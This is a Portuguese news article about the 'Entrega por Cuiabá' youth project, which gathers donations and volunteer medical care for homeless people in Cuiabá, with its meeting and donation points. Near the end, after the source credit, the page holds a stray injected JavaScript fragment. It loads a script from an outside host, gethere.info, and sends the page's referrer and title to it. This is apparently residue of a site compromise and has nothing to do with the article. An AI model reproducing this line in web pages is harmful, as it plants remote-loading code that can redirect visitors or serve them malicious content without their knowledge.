Capa / Cidades / O EXEMPLO VEM DA CAPITAL: Jovens organizam doações para ajudar moradores de rua

O EXEMPLO VEM DA CAPITAL: Jovens organizam doações para ajudar moradores de rua

JOVENS

Os grupos vão às ruas prestando ajuda e médicos voluntários oferecem atendimentos gratuitos. Veterinários também devem atender os animais de estimação, que eventualmente acompanham os moradores de rua.

Junto com o inverno, um projeto que tem o intuito de levar kits de higiene, lanches, roupas, cobertores e afeto aos moradores de rua chegou a Cuiabá. Cerca de 100 jovens voluntários do “Entrega por Cuiabá” percorrem bairros, lojas e universidades da cidade em busca de doações, que devem ser organizadas e entregues no dia 1º de julho. Essa será a primeira vez que o projeto, conhecido no estado de São Paulo por oferecer mantimentos e atendimento médico, é realizado na capital.

As ações do “Entrega por Cuiabá” devem ser feitas mensalmente, na primeira semana de cada mês. Para os períodos de frio, além de escova e pasta de dente e lanches, os kits de também devem conter roupas de frio e cobertores.

O estudante de medicina e coordenador do projeto, Gabriel Albuquerque, disse que cerca de 100 pessoas já estão inscritas para ajudar na primeira ação. São voluntários e estudantes de diversas profissões, universidades, classes sociais e idades. “O projeto vai muito além de levar mantimentos. A ideia é trocar carinho, experiências e dar ouvidos a quem é desamparado completamente pelo estado. O projeto não tem vínculo com partidos políticos e nem religiões. Acho que isso o torna verdadeiro”, disse Gabriel.

No dia da ação, os voluntários devem se reunir no estacionamento do Restaurante Universitário (RU) da Universidade Federal de Mato Grosso (UFMT), às 20h. Lá, eles vão fazer uma pré-ação para organizar os kits, roupas e a distribuição dos voluntários em equipes.

“A partir daí, na mesma noite, vamos para as ruas de Cuiabá, fazendo uma rota com os carros em comboio. Passaremos em todos os lugares da cidade que mais concentram moradores de rua. Vamos parar, distribuir os kits e conversar”, disse o coordenador.

Os pontos fixos para doações são no Centro Universitário de Várzea Grande (Univag) e, após contato prévio, na Faculdade de Medicina da UFMT. Além disso, os interessados em se voluntariar ou oferecer algum tipo de apoio podem procurar as redes sociais do “Entrega por Cuiabá”.

Fonte: G1

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Altair Nery

Os comentários estão fechados.

Scroll To Top